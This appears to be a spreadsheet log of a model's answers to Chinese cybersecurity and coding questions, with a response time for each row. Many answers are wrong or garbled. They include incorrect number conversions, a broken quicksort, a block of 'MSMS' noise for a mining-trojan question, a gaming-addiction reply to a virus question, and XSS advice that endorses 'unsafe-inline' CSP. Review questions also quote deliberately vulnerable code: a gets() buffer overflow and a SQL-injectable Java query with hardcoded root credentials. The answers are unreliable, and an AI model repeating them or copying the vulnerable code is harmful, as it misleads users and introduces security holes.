9. 使用内存占用检测：内存占用检测可以帮助开发者检测溢出漏洞。这种方法可以在程序运行时检测内存中的块是否已经释放，并提供相应的警告。
10. 避免在多线程环境中使用内存：多线程环境可能会导致溢出漏洞。因此，应该避免在多线程环境中使用内存。
总之，避免溢出漏洞需要充分了解内存管理的基本原则和内存安全框架。开发者应该遵循以上方法，以免溢出漏洞导致程序崩溃或数据泄露。</t>
        </is>
      </c>
      <c r="D120" t="n">
        <v>27.21307182312012</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="1" t="n">
        <v>119</v>
      </c>
      <c r="B121" t="inlineStr">
        <is>
          <t>如何避免XSS攻击</t>
        </is>
      </c>
      <c r="C121" t="inlineStr">
        <is>
          <t>XSS（Cross-Site Scripting）是一种常见的攻击方式，可以使您的网站或应用程序承诺着敏感数据。下面是一些避免XSS攻击的常见方法：
1. 使用HTML Sanitizing：将用户提交的数据过滤掉可能包含XSS攻击的字符串。可以使用HTML Sanitizing库，例如PHP的filter_var()函数或者JavaScript的encodeURIComponent()函数。
2. 防止脚本 executed：不允许脚本在您的网站上执行，避免脚本攻击。可以使用HTTP响应 headers中的Content-Security-Policy，例如："script-src 'self' 'unsafe-inline';"。
3. 验证用户input：对用户提交的数据进行验证，避免接受可能包含XSS攻击的数据。例如，不允许用户输入特定标签或属性。
4. 使用Content Security Policy（CSP）：使用CSP可以限制脚本和代码的执行，避免XSS攻击。例如，可以将CSP设置为："script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline';"。
5. 使用Nonce：使用Nonce可以防止脚本攻击。例如，可以在URL中添加一个随机值，例如："?nonce=random_value"。
6. 避免使用隐藏元素：不要使用隐藏元素，例如，隐藏的frameset或layers。
7. 使用HTTPS：使用HTTPS可以防止XSS攻击，因为HTTPS可以使网站数据在transfer中加密。
8. 避免使用受信任的域名：不要使用受信任的域名，例如，不要使用*.example.com。
9. 避免使用扩展名：不要使用扩展名，例如，不要使用*.js。
10. 避免使用脚本域名：不要使用脚本域名，例如，不要使用*.example.com/script.js。
需要注意的是，避免XSS攻击并不是一个简单的任务，需要对整个网站或应用程序进行全面的安全检查。</t>
        </is>
      </c>
      <c r="D121" t="n">
        <v>19.51575016975403</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="1" t="n">
        <v>120</v>
      </c>
      <c r="B122" t="inlineStr">
        <is>
          <t>网络安全风险三要素指什么</t>
        </is>
      </c>
      <c r="C122" t="inlineStr">
        <is>
          <t>Network security risk three elements refer to the three primary factors that contribute to the likelihood and impact of security threats in a computer network. These elements are:
1. Assets: The first element is assets, which refers to the valuable data, systems, and resources that are vulnerable to security threats. These assets can include sensitive information, intellectual property, financial data, and other critical assets that must be protected.
2. Threats: The second element is threats, which refers to the various sources of security risks that can compromise the security of the network. These threats can come from internal or external sources, including malicious actors, hackers, viruses, worms, and other types of cyber threats.
3. Vulnerabilities: The third element is vulnerabilities, which refers to the weaknesses or gaps in the network's security defenses that can be exploited by threats. Vulnerabilities can include outdated software, unpatched systems, insufficient security measures, and other weaknesses that can be leveraged by attackers.
By understanding these three elements, organizations can better identify and manage their security risks, and take steps to protect their valuable assets from potential threats.</t>
        </is>
      </c>
      <c r="D122" t="n">
        <v>6.84211540222168</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="1" t="n">
        <v>121</v>
      </c>
      <c r="B123" t="inlineStr">
        <is>
          <t>网络安全风险评估的主要步骤是什么</t>
        </is>
      </c>
      <c r="C123" t="inlineStr">
        <is>
          <t>network security risk assessment is a crucial process that involves evaluating the potential threats and vulnerabilities in a computer network. The following are the main steps involved in a network security risk assessment:
1. Identify Assets: The first step is to identify the assets that need to be protected, including hardware, software, data, and other network resources.
2. Identify Threats: Next, identify potential threats to the network, including malware, hacking, unauthorized access, and other types of cyber threats.
3. Assess Vulnerabilities: Evaluate the network's vulnerabilities to potential threats, including weak passwords, unpatched software, and inadequate security measures.
4. Determine Risk Levels: Assign a risk level to each identified threat and vulnerability, based on factors such as the likelihood of an attack and the potential impact on the network.
5. Develop a Risk Mitigation Plan: Based on the risk levels assigned, develop a plan to mitigate or eliminate the identified risks, including implementing security measures, training employees, and establishing incident response procedures.
6. Continuously Monitor and Review: Continuously monitor and review the network's security posture to ensure that the risk mitigation plan is effective and to identify any new threats or vulnerabilities that need to be addressed.
7. Prioritize and Focus: Prioritize the risks based on their potential impact and likelihood of occurrence, and focus on addressing the most critical risks first.
8. Communicate and Collaborate: Communicate the results of the risk assessment to relevant stakeholders and collaborate with them to address the identified risks.
9. Document and Update: Document the risk assessment findings and update them regularly to ensure that the risk assessment remains current and relevant.
By following these steps, organizations can effectively assess and manage the risks associated with their computer networks, helping to ensure the confidentiality, integrity, and availability of their data and systems.</t>
        </is>
      </c>
      <c r="D123" t="n">
        <v>11.49848198890686</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="1" t="n">
        <v>122</v>
      </c>
      <c r="B124" t="inlineStr">
        <is>
          <t>应急响应的流程是什么</t>
        </is>
      </c>
      <c r="C124" t="inlineStr">
        <is>
          <t>应急响应是指在紧急情况下，能够快速、有效地应对和处理的过程。应急响应流程通常包括以下几个步骤：
1. 报警：在紧急情况出现时，发送紧急报警 signals，通常使用紧急报警按钮或者其他报警工具。
2. 评估情况：在报警后，评估紧急情况的严重程度和影响 scope，确定应急响应级别和应急措施。
3. 确定应急措施：根据评估结果，确定应急措施，包括警示、救援、防范、恢复等。
4. 执行应急措施：按照计划进行应急措施，包括警示、救援、防范、恢复等。
5. 评估结果：在应急情况过后，评估应急响应效果，检查是否有缺陷、潜在问题，并根据情况进行改进和优化。
6. 救援和恢复：在紧急情况已经得到控制后，开始救援和恢复工作，包括救援人员、物资和设备等。
7. 危机管理：在应急情况过后，评估和管理危机的影响，确定是否需要进行危机管理和回归工作。
总之，应急响应流程是一个复杂的过程，需要系统性地优化和管理，以确保在紧急情况下能够快速、有效地应对和处理。</t>
        </is>
      </c>
      <c r="D124" t="n">
        <v>17.13848471641541</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="1" t="n">
        <v>123</v>
      </c>
      <c r="B125" t="inlineStr">
        <is>
          <t>主机中了挖矿木马，如何处置</t>
        </is>
      </c>
      <c r="C125" t="inlineStr">
        <is>
          <t>MS AccessMS SQL_MSN_F_NDETA
MS_MS_N_M_SMS_M_E
_RD MS_M_E MS_M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 MSMSMS MS MSMSMS MSMSMS MSMS MSMSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMSMS MSMS MSMS MSMS MSMSMS MSMS MSMS MSMSMS MSMS MSMS MSMS MSMS MSMS MSMS MSMSMS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 MSMS</t>
        </is>
      </c>
      <c r="D125" t="n">
        <v>53.14484357833862</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="1" t="n">
        <v>124</v>
      </c>
      <c r="B126" t="inlineStr">
        <is>
          <t>我的电脑中了勒索病毒，怎么办</t>
        </is>
      </c>
      <c r="C126" t="inlineStr">
        <is>
          <t>我的电脑中了一种勒索病毒，我不知道该如何处理。我已经尝试了几种方法，但都没有效果。请问你有什么建议？
勒索病毒是一种软件，它可以让你的电脑执行恶意的操作，包括泄露你的个人信息、滥用你的钱、洗空你的钱等。如果你的电脑中了勒索病毒，你应该立即采取紧急措施，以防止更大的损失。
以下是处理勒索病毒的一些常见方法：
1. 升级系统和软件：确保你的系统和软件是最新的版本，这可以减少勒索病毒的攻击面。
2. 停止使用电脑：如果你发现电脑中了勒索病毒，一直到你解决问题时，请停止使用电脑。这可以防止勒索病毒继续执行恶意操作。
3. 寻求专业帮助：如果你无法解决问题，请寻求专业的帮助，例如咨询公司或计算机医生。他们可以帮助你解决问题，并保护你的个人信息和钱。
4. 使用反勒索软件：反勒索软件可以帮助你找到和删除勒索病毒。你可以尝试使用一些常用的反勒索软件，如Avast、AVG、Malwarebytes等。
5. 备份数据：如果你的电脑中了勒索病毒，请备份你的重要数据，以防止损失。
请注意，处理勒索病毒可能需要一些技术知识和经验，如果你不熟悉这方面的事情，请寻求专业帮助。</t>
        </is>
      </c>
      <c r="D126" t="n">
        <v>18.0561683177948</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="1" t="n">
        <v>125</v>
      </c>
      <c r="B127" t="inlineStr">
        <is>
          <t>电脑中毒了怎么办</t>
        </is>
      </c>
      <c r="C127" t="inlineStr">
        <is>
          <t>（How to deal with addiction to computer games）
Computer games have become a popular form of entertainment for many people, but excessive gaming can lead to addiction. If you or someone you know is addicted to computer games, here are some steps to help you deal with the problem:
1. Identify the problem: The first step is to recognize that you or your loved one has a problem. Be honest with yourself or your loved one about the amount of time spent playing games and how it is affecting your daily life.
2. Set limits: Establish limits on the amount of time spent playing games. Set a specific time limit for gaming and stick to it. You can also set a schedule for gaming, such as only playing during specific hours of the day.
3. Find alternative activities: Encourage the person to engage in other activities, such as exercise, reading, or spending time with friends and family. This can help reduce the temptation to play games excessively.
4. Seek support: Encourage the person to seek support from friends, family, or a therapist. Joining a support group, such as Gaming Addicts Anonymous, can also be helpful.
5. Consider therapy: Cognitive-behavioral therapy (CBT) is a helpful approach in treating video game addiction. A therapist can help the person identify the underlying causes of their addiction and develop strategies to manage their gaming habits.
6. Remove temptations: Remove or limit access to gaming devices, such as computers or gaming consoles, in areas where they are likely to be tempted to play.
7. Seek professional help: If the addiction is severe, seek professional help from a mental health professional. They can help you or your loved one develop a treatment plan and provide support in overcoming the addiction.
8. Take breaks: Take regular breaks from gaming to give the brain a chance to rest and recover.
9. Practice self-care: Encourage the person to practice self-care, such as getting enough sleep, eating a healthy diet, and engaging in regular exercise.
10. Be patient: Overcoming an addiction takes time and effort. Be patient with yourself or your loved one and recognize that setbacks are a normal part of the recovery process.
Remember, dealing with addiction is a process, and it may take time to overcome. However, with the right support and strategies, it is possible to overcome an addiction to computer games and lead a healthier, more balanced life.</t>
        </is>
      </c>
      <c r="D127" t="n">
        <v>14.40352416038513</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="1" t="n">
        <v>126</v>
      </c>
      <c r="B128" t="inlineStr">
        <is>
          <t>为什么网页打不开了</t>
        </is>
      </c>
      <c r="C128" t="inlineStr">
        <is>
          <t>如果您的网页不能打开，这可能是因为以下原因：
1. 网络连接问题：如果您的网络连接不稳定或不正确，可能无法打开网页。请检查网络连接的正确性，并尝试更换网络连接或重新启动计算机。
2. 浏览器问题：您的浏览器可能受到了恶意软件或恶意软件的攻击，导致打开网页失败。请尝试升级浏览器到最新的版本，或者卸载恶意软件。
3. 网站技术问题：网站管理员可能正在解决网站技术问题，导致您无法访问网站。请等待网站管理员解决问题，或者尝试使用其他浏览器打开网站。
4. 端口问题：网页可能受到端口问题的干扰，导致打开失败。请尝试重新启动计算机或端口服务，或者尝试使用其他端口打开网页。
5. 安全警告：您的浏览器可能发现网站上存在潜在的安全隐患，导致打开网页失败。请尝试启用浏览器的安全功能，或者尝试使用其他浏览器打开网页。
6. 网络端口阻塞：网络端口可能受到阻塞，导致打开网页失败。请尝试重新启动计算机或端口服务，或者尝试使用其他端口打开网页。
7. 浏览器插件问题：您的浏览器可能受到插件问题的影响，导致打开网页失败。请尝试卸载浏览器插件，或者尝试使用其他浏览器打开网页。
8. 系统问题：您的系统可能受到问题，导致打开网页失败。请尝试升级系统到最新的版本，或者尝试卸载恶意软件。
9.  DNS 问题：网络可能受到 DNS 问题的影响，导致打开网页失败。请尝试升级 DNS 服务器，或者尝试尝试使用其他 DNS 服务器打开网页。
10. 网站崩溃：网站可能已经崩溃或停止运行，导致无法打开网页。请尝试尝试其他方法打开网站，或者等待网站管理员解决问题。
如果您的网页仍然无法打开，请尝试提供更多的信息，如错误提示或网页的具体内容，以便更好地解决问题。</t>
        </is>
      </c>
      <c r="D128" t="n">
        <v>25.27295684814453</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="1" t="n">
        <v>127</v>
      </c>
      <c r="B129" t="inlineStr">
        <is>
          <t>用python写一个快速排序算法</t>
        </is>
      </c>
      <c r="C129" t="inlineStr">
        <is>
          <t>```
def quick_sort(arr):
    if len(arr) &lt;= 1:
        return arr
    pivot = arr[0]
    less = [x for x in arr[1:] if x &lt;= pivot]
    greater = [x for x in arr[1:] if x &gt; pivot]
    return quick_sort(less), quick_sort(greater)
```
这个算法是基于快速排序算法的，它会在数组中分为两个部分，一个是小于 pivot 的元素，另一个是大于 pivot 的元素。然后对这两个部分进行快速排序，最后将它们合并成一个排序完毕的数组。
这个算法的时间复杂度为 O(n log n)，其中 n 是数组的大小。这个时间复杂度是快速排序算法的最好情况，因为它可以在大多数情况下只需要执行一些简单的比较操作来排序整个数组。
但是，这个算法的空间复杂度为 O(n)，这意味着它需要存储整个数组的拷贝，这可能会导致性能下降。因此，在实际应用中，需要考虑使用其他排序算法，例如桶排序或希尔乔布排序等，它们的时间复杂度和空间复杂度都比快速排序算法更优秀。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D129" t="n">
        <v>11.84148073196411</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="1" t="n">
        <v>128</v>
      </c>
      <c r="B130" t="inlineStr">
        <is>
          <t>使用Java语言将一个对象序列化</t>
        </is>
      </c>
      <c r="C130" t="inlineStr">
        <is>
          <t>到一个字节stream中
```
import java.io.*;
import java.util.*;
public class Serialize {
    public static void main(String[] args) throws IOException {
        Person person = new Person("Jack", 30, "Java Developer");
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(person);
        oos.flush();
        oos.close();
        byte[] byteArray = bos.toByteArray();
        System.out.println(new String(byteArray));
    }
}
class Person implements Serializable {
    private String name;
    private int age;
    private String profession;
    public Person(String name, int age, String profession) {
        this.name = name;
        this.age = age;
        this.profession = profession;
    }
    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public int getAge() {
        return age;
    }
    public void setAge(int age) {
        this.age = age;
    }
    public String getProfession() {
        return profession;
    }
    public void setProfession(String profession) {
        this.profession = profession;
    }
}
```
在上面的代码中，我们首先创建了一个`Person`对象，然后使用`ObjectOutputStream`将其序列化到一个字节流中。最后，我们使用`ByteArrayOutputStream`将这个字节流转换为一个字节数组，并打印出它的内容。
注意，在序列化对象时，我们需要使用`Serializable`接口，以便在序列化对象时能够正确地访问它的字段。在这个例子中，我们使用`Person`类中的各个字段来序列化对象。
这个例子只是一个简单的示例，实际情况中可能需要根据具体情况进行更多的配置和处理。例如，可以使用`ObjectStreamClass`来指定要序列化对象的类，或者使用`SerializedObject`来将对象序列化成一个更加简洁的形式。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D130" t="n">
        <v>15.8686797618866</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="1" t="n">
        <v>129</v>
      </c>
      <c r="B131" t="inlineStr">
        <is>
          <t>使用Golang写一个爬虫</t>
        </is>
      </c>
      <c r="C131" t="inlineStr">
        <is>
          <t>go Lang中有几种常用的爬虫框架，比如：
1. Go-crawl：Go-crawl是一个基于Golang的爬虫框架，可以用于爬取网站的内容。
2. Gocrawler：Gocrawler是一个基于Go的爬虫框架，它提供了一个简单的 API，可以用于爬取网站的内容。
3. Crawler：Crawler是一个基于Golang的爬虫框架，它提供了一个简单的 API，可以用于爬取网站的内容。
4. Go-scraper：Go-scraper是一个基于Golang的爬虫框架，它可以用于爬取网站的内容，同时也支持爬取页面的响应体。
这些框架都提供了一些基本的功能，例如：
* 爬取网站的内容
* 爬取页面的响应体
* 爬取网站的结构
* 爬取网站的链接
可以根据具体的需求选择合适的框架来实现。
在使用Golang写一个爬虫时，需要注意以下几点：
1. 请求方法：爬虫可以使用 GET、POST、PUT、DELETE 等请求方法来访问网站。
2. 爬取url：爬虫需要提供爬取url，用于爬取网站的内容。
3. 爬取标签：爬虫可以使用标签（如：标签）来爬取网站的内容。
4. 爬取响应体：爬虫需要处理爬取到的响应体，例如：JSON、XML 等。
5. 爬取链接：爬虫可以使用链接（如：链接）来爬取网站的内容。
6. 爬取速率：爬虫需要根据爬取速率来控制爬虫的运行，避免访问速度过快导致网站崩溃。
7. 爬取深度：爬虫可以根据爬取深度来控制爬虫的运行，避免访问过多的网站。
8. 爬取间隔：爬虫可以根据爬取间隔来控制爬虫的运行，避免访问过快。
9. 爬取结果：爬虫可以使用结果（如：爬取结果）来存储爬取到的内容。
这些参数可以根据具体的需求进行配置。
在使用Golang写一个爬虫时，可以使用以下基本步骤：
1. 创建一个爬虫 struct 来包含爬虫的配置和内容。
2. 创建一个爬虫的 main 函数来实现爬虫的运行。
3. 在 main 函数中，使用 Request 类来发送请求，并使用 Response 类来处理响应。
4. 在处理响应时，可以使用正则表达式或者字符串处理来提取内容。
5. 将爬取到的内容存储在一个结果结构体中，例如： Result struct。
6. 在爬虫运行时，可以根据需要进行配置和控制，例如：控制爬取速率、爬取深度、爬取间隔等。
以下是一个简单的爬虫示例，使用了 Go-crawl 框架：
```
package main
import (
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
	"time"
	"github.com/go-crawler/crawler"
)
type Result struct {
	Title string `json:"title"`
	Links []struct {
		Href string `json:"href"`
	} `json:"links"`
}
func main() {
	// 设置爬虫的配置
	c := crawler.NewCrawler()
	c.SetHost("https://www.example.com")
	c.SetStartPage("")
	c.SetDepth(1)
	c.SetInterVal(time.Duration(1) * time.Second)
	// 爬虫的主要逻辑
	c.Crawl(func(res *http.Request, resp *http.Response) error {
		// 解析响应体
		body, err := ioutil.ReadAll(resp.Body)
		if err != nil {
			return err
		}
		// 提取标题和链接
		result := &amp;Result{}
		err = json.Unmarshal(body, result)
		if err != nil {
			return err
		}
		// 打印标题和链接
		fmt.Println(result.Title)
		for _, link := range result.Links {
			fmt.Println(link.Href)
		}
		return nil
	})
}
```
这个爬虫使用了 Go-crawler 框架，并使用了 Net 包中的 http 类来发送请求。在爬虫的主要逻辑中，使用了 json 包来解析响应体，并提取标题和链接。
请注意，这只是一个简单的示例，实际情况中可能需要更多的逻辑来处理爬虫的具体行为。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D131" t="n">
        <v>45.76587295532227</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="1" t="n">
        <v>130</v>
      </c>
      <c r="B132" t="inlineStr">
        <is>
          <t>当采用分块查找时，数据的组织方式是什么</t>
        </is>
      </c>
      <c r="C132" t="inlineStr">
        <is>
          <t>在分块查找算法中，数据的组织方式是一个或多个块。具体来说，每个块都包含一定数量的数据元素，并且每个块都有一个块编号。通常，块编号是从0开始的整数，直到总数据量为块大小的整数倍。
在分块查找算法中，数据的组织方式可以通过以下方式实现：
1. 块大小是固定的：在这种方式中，块大小是固定的，即每个块都包含相同的数量的数据元素。
2. 块大小适应数据量：在这种方式中，块大小可以适应数据量，即每个块都包含相应的数量的数据元素。
3. 块大小是递增的：在这种方式中，块大小逐渐增加，直到总数据量为块大小的整数倍。
当采用分块查找时，需要根据实际情况进行数据的组织方式选择，以优化查找效率和精度。</t>
        </is>
      </c>
      <c r="D132" t="n">
        <v>10.40744805335999</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="1" t="n">
        <v>131</v>
      </c>
      <c r="B133" t="inlineStr">
        <is>
          <t>ElasticSearch搜索一个时间范围的语法是什么</t>
        </is>
      </c>
      <c r="C133" t="inlineStr">
        <is>
          <t>ElasticSearch提供了多种方式来搜索一个时间范围，以下是其中的一些：
1. 使用 `range` 查询：可以使用 `range` 查询来搜索一个时间范围。例如：
```json
GET /my-index/_search
{
  "query": {
    "range": {
      "created_at": {
        "gte": "2022-01-01T00:00:00Z",
        "lte": "2022-01-31T23:59:59Z"
      }
    }
  }
}
```
这个例子中，我们使用 `created_at` 字段来搜索一个时间范围，从 `2022-01-01T00:00:00Z` 到 `2022-01-31T23:59:59Z`。
2. 使用 `date_histogram` 查询：可以使用 `date_histogram` 查询来搜索一个时间范围，并将结果分别对应不同的时间段。例如：
```json
GET /my-index/_search
{
  "query": {
    "date_histogram": {
      "field": "created_at",
      "interval": "day",
      "range": {
        "gte": "2022-01-01T00:00:00Z",
        "lte": "2022-01-31T23:59:59Z"
      }
    }
  }
}
```
这个例子中，我们使用 `date_histogram` 查询来搜索 `created_at` 字段中的每一天的数量，从 `2022-01-01T00:00:00Z` 到 `2022-01-31T23:59:59Z`。
3. 使用 `range` 查询和 `missing` 查询：可以使用 `range` 查询和 `missing` 查询来搜索一个时间范围，并且返回一个数组，其中包含具体的时间和对应的数量。例如：
```json
GET /my-index/_search
{
  "query": {
    "range": {
      "created_at": {
        "gte": "2022-01-01T00:00:00Z",
        "lte": "2022-01-31T23:59:59Z"
      }
    },
    "missing": {
      "created_at": {
        "gte": "2022-01-01T00:00:00Z",
        "lte": "2022-01-31T23:59:59Z"
      }
    }
  }
}
```
这个例子中，我们使用 `range` 查询和 `missing` 查询来搜索 `created_at` 字段中的每一天的数量，从 `2022-01-01T00:00:00Z` 到 `2022-01-31T23:59:59Z`。
这些方法可以单独使用，也可以组合使用，以满足不同的搜索需求。</t>
        </is>
      </c>
      <c r="D133" t="n">
        <v>24.93743014335632</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="1" t="n">
        <v>132</v>
      </c>
      <c r="B134" t="inlineStr">
        <is>
          <t>更新记录的SQL语句是什么</t>
        </is>
      </c>
      <c r="C134" t="inlineStr">
        <is>
          <t>根据mybatis的文档，更新记录的SQL语句是以下语法：
```sql
update &lt;table_name&gt; set &lt;column_name1&gt; = &lt;value1&gt;, &lt;column_name2&gt; = &lt;value2&gt;, ... where &lt;where_clause&gt;
```
其中：
* `&lt;table_name&gt;`：表名
* `&lt;column_name1&gt;`、 `&lt;column_name2&gt;` ...：要更新的列名
* `&lt;value1&gt;`、 `&lt;value2&gt;` ...：要更新的值
* `&lt;where_clause&gt;`：条件，用于筛选要更新的记录
例如，更新名为“users”的表中的记录，其中“age” column 的值为25，“name” column 的值为“tom”，except where “id” column 的值为100：
```sql
update users set age = 25, name = 'tom' where id != 100
```
但是，如果要更新多个列，可以使用逗号分隔：
```sql
update users set age = 25, name = 'tom', sex = 'male' where id != 100
```
如果要更新的列是一个复杂的expression，可以使用INTO clause：
```sql
update users set age = :age, name = :name, sex = :sex where id != 100
```
其中：
* `:age`、`:name`、`:sex`：要更新的列名
* `:age`、`:name`、`:sex`：要更新的值
这种方式可以使更新的列是一个复杂的expression。</t>
        </is>
      </c>
      <c r="D134" t="n">
        <v>10.70548343658447</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="1" t="n">
        <v>133</v>
      </c>
      <c r="B135" t="inlineStr">
        <is>
          <t>10010的二进制编码是什么</t>
        </is>
      </c>
      <c r="C135" t="inlineStr">
        <is>
          <t>对于整数 $10010$，其二进制编码是：
$$10010 = 1 \times 2^3 + 0 \times 2^2 + 1 \times 2^1 + 0 \times 2^0$$
因此，$10010$的二进制编码为：
$$10010 = 10 \times 2^3 + 0 \times 2^2 + 10 \times 2^1 + 0 \times 2^0$$
希望这有帮助！</t>
        </is>
      </c>
      <c r="D135" t="n">
        <v>3.777580499649048</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="1" t="n">
        <v>134</v>
      </c>
      <c r="B136" t="inlineStr">
        <is>
          <t>10086的十六进制编码是什么</t>
        </is>
      </c>
      <c r="C136" t="inlineStr">
        <is>
          <t>10086 的十六进制编码是 4A 03 06 0A。</t>
        </is>
      </c>
      <c r="D136" t="n">
        <v>0.7887263298034668</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="1" t="n">
        <v>135</v>
      </c>
      <c r="B137" t="inlineStr">
        <is>
          <t>二进制101011是十进制的几</t>
        </is>
      </c>
      <c r="C137" t="inlineStr">
        <is>
          <t>binary 101011 是 decimal 的几？
binary 101011 是 decimal 的 5。</t>
        </is>
      </c>
      <c r="D137" t="n">
        <v>0.9935867786407471</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="1" t="n">
        <v>136</v>
      </c>
      <c r="B138" t="inlineStr">
        <is>
          <t>URL解码%3Cscript%3E后的结果是什么</t>
        </is>
      </c>
      <c r="C138" t="inlineStr">
        <is>
          <t>请注意，在实际应用中，URL编码的字符串中可能会含有其他字符，除了上述ASCII字符。这些字符也会被URL编码处理。
为了解决这个问题，一般可以使用URL编码的具体规则来解析URL编码的字符串。例如，在URL编码中，以下字符将被编码为字符串“%”：
* 制式字符（例如，！、”、’、，）
* 控制字符（例如， tabs、linefeeds、 carriage returns）
* URL编码字符（例如，%)
在上面的示例中，URL编码的字符串“after%3Cscript%3E”将被解码为“after%3Cscript%3E”。
另外，URL编码的字符串中还可能包含其他字符，例如：
* 特殊字符（例如，&amp;、;）
* 编码字符（例如，%）
在解码URL编码字符串时，需要考虑这些字符的含义。
总之，URL编码的结果是一个包含特殊字符的字符串，需要在解码时考虑这些字符的含义。</t>
        </is>
      </c>
      <c r="D138" t="n">
        <v>9.457606077194214</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="1" t="n">
        <v>137</v>
      </c>
      <c r="B139">
        <f>=的URL编码是什么</f>
        <v/>
      </c>
      <c r="C139">
        <f>===================
URL编码（URL encoding）是将字符串转换为URL可读的字符串的过程。这种转换使用字符串的ASCII码来表示字符，以避免在URL中出现特殊字符。
在URL编码中，特殊字符会被编码为ASCII码的字符。以下是一些常见的URL编码：
* 符号特殊字符（！、"、#、$、%、&amp;、'、*、+、, /）
* 字母ü、ö、ä、ß（在URL中不可用，需要使用%HH的编码）
* 数字0-9
* 字符串中的空格和特殊字符（其他的字符将被编码）
例如，将字符串"Hello World!"编码为URL中可读的字符串：
"Hello%20World!"
在上面的编码中，特殊字符!"、"、#、$、%、&amp;、'、*、+、, / 都被编码为ASCII码的字符。同时，字母ü、ö、ä、ß也会被编码为ASCII码的字符。
总之，URL编码的目的是将字符串转换为可以在URL中直接使用的字符串，避免特殊字符的问题。</f>
        <v/>
      </c>
      <c r="D139" t="n">
        <v>9.497620344161987</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="1" t="n">
        <v>138</v>
      </c>
      <c r="B140" t="inlineStr">
        <is>
          <t>cyber的unicode编码结果是什么</t>
        </is>
      </c>
      <c r="C140" t="inlineStr">
        <is>
          <t>cyber的unicode编码结果是U+2603。
U+2603是一个emoji，它的字符代码是U+2603。emoji是一种基于 Unicode 的文本编码方式，用于在不同的计算机和设备上显示不同的表情符号。Unicode 是一个国际标准，用于编码文本和字符，并提供了大量的字符和符号，包括文本字符、字词、symbols、emoji等。</t>
        </is>
      </c>
      <c r="D140" t="n">
        <v>3.927474737167358</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="1" t="n">
        <v>139</v>
      </c>
      <c r="B141" t="inlineStr">
        <is>
          <t>\u4f8b\u5b50的ascii解码是什么中文？</t>
        </is>
      </c>
      <c r="C141" t="inlineStr">
        <is>
          <t>\u4f8b\u5b50的ascii解码是什么中文？
As far as I know, the code points `\u4f8b` and `\u5b50` are not ASCII characters. They are both Unicode code points that represent characters in the Chinese language.
 `\u4f8b` represents the character "吴" (wú) in Simplified Chinese, and
 `\u5b50` represents the character "伟" (wěi) in Simplified Chinese.
So, the ASCII decode of these code points is not possible, as ASCII is a character encoding standard that only supports a limited set of characters, and does not include Chinese characters.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D141" t="n">
        <v>4.240092992782593</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="1" t="n">
        <v>140</v>
      </c>
      <c r="B142" t="inlineStr">
        <is>
          <t>这段代码有什么问题
int main() {
    bufferOverflow();
 }
 bufferOverflow() {
    char textLine[10];
    printf("Enter your line of text: ");
    gets(textLine);
    printf("You entered: ", textLine);
    return 0;
 }</t>
        </is>
      </c>
      <c r="C142" t="inlineStr">
        <is>
          <t>The problem with this code is that it has a buffer overflow vulnerability. Can you explain why and how to fix it?
The buffer overflow vulnerability occurs because the `gets` function does not perform any bounds checking on the input entered by the user. This means that if the user enters more than 9 characters, the buffer `textLine` will overflow and overwrite the memory location following it. This can lead to unpredictable behavior, including code execution, data tampering, or crashes.
To fix the buffer overflow vulnerability, you can use the `fgets` function instead of `gets`. `fgets` provides more flexibility and control over the input processing, and it includes a `max_size` parameter that allows you to specify a maximum input size, which can help prevent buffer overflows.
Here's an updated version of the code that fixes the buffer overflow vulnerability:
```
#include &lt;stdio.h&gt;
int main() {
    char textLine[10];
    printf("Enter your line of text: ");
    fgets(textLine, sizeof(textLine), stdin);
    printf("You entered: %s\n", textLine);
    return 0;
}
```
In this updated version of the code, we use `fgets` instead of `gets`. The `fgets` function takes three parameters: the first is a pointer to the buffer `textLine`, the second is the maximum size of the buffer `sizeof(textLine)`, and the third is a pointer to the input stream `stdin`. The `sizeof(textLine)` parameter ensures that the buffer has enough space to hold the maximum input size, and the `stdin` parameter allows the function to read input from the standard input stream.
By using `fgets` instead of `gets`, we can avoid the buffer overflow vulnerability and ensure that the input is processed safely and securely.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D142" t="n">
        <v>10.60416984558105</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="1" t="n">
        <v>141</v>
      </c>
      <c r="B143" t="inlineStr">
        <is>
          <t>这段代码有什么问题
Class.forName("com.mysql.cj,jdbc.Driver");
coon = DriverManager.getConnection("jdbc:mysql://192.168.88.20:3306/iwebsec?&amp;useSSL=false&amp;serverTimezone=UTC","root","root)";
String id ="2";
String sql ="select* from user where id ="+id;
ps = conn.createStatement();
rs = ps.executeQuery(sql);
while(rs.next())
{
	System.out.println("id:"+rs,getlnt("id")+"usermame:"+rs.getString("username")+"password:"+rs.getString("password");
}</t>
        </is>
      </c>
      <c r="C143" t="inlineStr">
        <is>
          <t>}
catch(Exception e)
{
	System.out.println("Error:"+e.getMessage());
}
}
